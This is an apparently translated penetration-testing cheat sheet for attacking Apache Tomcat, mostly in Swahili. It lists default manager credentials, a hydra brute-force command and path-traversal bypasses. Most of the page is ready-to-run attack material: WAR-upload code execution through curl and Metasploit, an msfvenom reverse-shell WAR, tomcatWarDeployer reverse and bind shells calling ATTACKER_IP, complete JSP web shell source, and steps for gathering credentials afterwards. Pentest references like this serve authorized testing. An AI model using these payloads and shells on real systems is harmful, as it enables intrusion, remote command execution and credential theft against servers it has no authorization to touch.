Try Hard Security Group

Join the Try Hard Security Discord Server!Discord

Ugunduzi

• Kawaida inafanya kazi kwenye bandari 8080

• Kosa la kawaida la Tomcat:

Uhesabu

Utambulisho wa Toleo

Ili kupata toleo la Apache Tomcat, amri rahisi inaweza kutekelezwa:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

Hii itatafuta neno "Tomcat" katika ukurasa wa index wa hati, ikifunua toleo katika lebo ya kichwa ya jibu la HTML.

Mahali pa Faili za Meneja

Kutambua maeneo halisi ya /manager na /host-manager ni muhimu kwani majina yao yanaweza kubadilishwa. Tafutizi ya nguvu inashauriwa ili kupata kurasa hizi.

Uainishaji wa Jina la Mtumiaji

Kwa toleo za Tomcat zilizopita ya 6, inawezekana kuainisha majina ya watumiaji kupitia:

msf> use auxiliary/scanner/http/tomcat_enum

Default Credentials

Direktori /manager/html ni nyeti sana kwani inaruhusu kupakia na kutekeleza faili za WAR, ambazo zinaweza kusababisha utekelezaji wa msimbo. Direktori hii inalindwa na uthibitishaji wa msingi wa HTTP, ambapo akidi za kawaida ni:

• admin:admin

• tomcat:tomcat

• admin:

• admin:s3cr3t

• tomcat:s3cr3t

• admin:tomcat

Akidi hizi zinaweza kupimwa kwa kutumia:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Another notable directory is /manager/status, which displays the Tomcat and OS version, aiding in vulnerability identification.

Brute Force Attack

Ili kujaribu shambulio la brute force kwenye saraka ya meneja, mtu anaweza kutumia:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Along with setting various parameters in Metasploit to target a specific host.

Common Vulnerabilities

Password Backtrace Disclosure

Kufikia /auth.jsp kunaweza kufichua nenosiri katika backtrace chini ya hali nzuri.

Double URL Encoding

Uthibitisho wa CVE-2007-1860 katika mod_jk unaruhusu upitaji wa njia wa double URL encoding, ukiruhusu ufikiaji usioidhinishwa wa kiolesura cha usimamizi kupitia URL iliyoundwa kwa njia maalum.

Ili kufikia wavuti ya usimamizi ya Tomcat nenda: pathTomcat/%252E%252E/manager/html

/examples

Apache Tomcat toleo 4.x hadi 7.x linajumuisha skripti za mfano ambazo zinaweza kuathiriwa na ufichuzi wa taarifa na mashambulizi ya cross-site scripting (XSS). Skripti hizi, zilizoorodheshwa kwa kina, zinapaswa kuangaliwa kwa ufikiaji usioidhinishwa na uwezekano wa kutumiwa vibaya. Pata maelezo zaidi hapa

• /examples/jsp/num/numguess.jsp

• /examples/jsp/dates/date.jsp

• /examples/jsp/snp/snoop.jsp

• /examples/jsp/error/error.html

• /examples/jsp/sessions/carts.html

• /examples/jsp/checkbox/check.html

• /examples/jsp/colors/colors.html

• /examples/jsp/cal/login.html

• /examples/jsp/include/include.jsp

• /examples/jsp/forward/forward.jsp

• /examples/jsp/plugin/plugin.jsp

• /examples/jsp/jsptoserv/jsptoservlet.jsp

• /examples/jsp/simpletag/foo.jsp

• /examples/jsp/mail/sendmail.jsp

• /examples/servlet/HelloWorldExample

• /examples/servlet/RequestInfoExample

• /examples/servlet/RequestHeaderExample

• /examples/servlet/RequestParamExample

• /examples/servlet/CookieExample

• /examples/servlet/JndiServlet

• /examples/servlet/SessionExample

• /tomcat-docs/appdev/sample/web/hello.jsp

Path Traversal Exploit

Katika mipangilio yenye hatari ya Tomcat unaweza kupata ufikiaji wa saraka zilizolindwa katika Tomcat ukitumia njia: /..;/

Hivyo, kwa mfano, unaweza kuwa na uwezo wa kufikia ukurasa wa usimamizi wa Tomcat kwa kufikia: www.vulnerable.com/lalala/..;/manager/html

Njia nyingine ya kupita njia zilizolindwa kwa kutumia hila hii ni kufikia http://www.vulnerable.com/;param=value/manager/html

RCE

Hatimaye, ikiwa una ufikiaji wa Tomcat Web Application Manager, unaweza kupakia na kupeleka faili ya .war (tekeleza msimbo).

Limitations

Utakuwa na uwezo wa kupeleka WAR tu ikiwa una mamlaka ya kutosha (majukumu: admin, manager na manager-script). Maelezo hayo yanaweza kupatikana chini ya tomcat-users.xml ambayo kwa kawaida huwekwa katika /usr/share/tomcat9/etc/tomcat-users.xml (inategemea toleo) (angalia POST section).

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

1. Tengeneza war ili kupeleka:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

2. Pakia faili la revshell.war na upate ufikiaji kwake (/revshell/):

Bind na reverse shell na tomcatWarDeployer.py

Katika baadhi ya hali hii haifanyi kazi (kwa mfano toleo za zamani za sun)

Pakua

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Reverse shell

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Kutumia Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Manual method - Web shell

Create index.jsp with this content:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

Unaweza pia kufunga hii (inaruhusu kupakia, kupakua na kutekeleza amri): http://vonloesch.de/filebrowser.html

Njia ya Kwanza ya Kiganja 2

Pata shell ya wavuti ya JSP kama hii na uunde faili la WAR:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Jina la faili la akreditif za Tomcat ni tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Njia nyingine za kukusanya akreditifiki za Tomcat:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Zana nyingine za skanning tomcat

• https://github.com/p0dalirius/ApacheTomcatScanner

Marejeleo

• https://github.com/simran-sankhala/Pentest-Tomcat

• https://hackertarget.com/sample/nexpose-metasploitable-test.pdf

Jaribu Kikundi cha Usalama wa Hard

Join the Try Hard Security Discord Server!Discord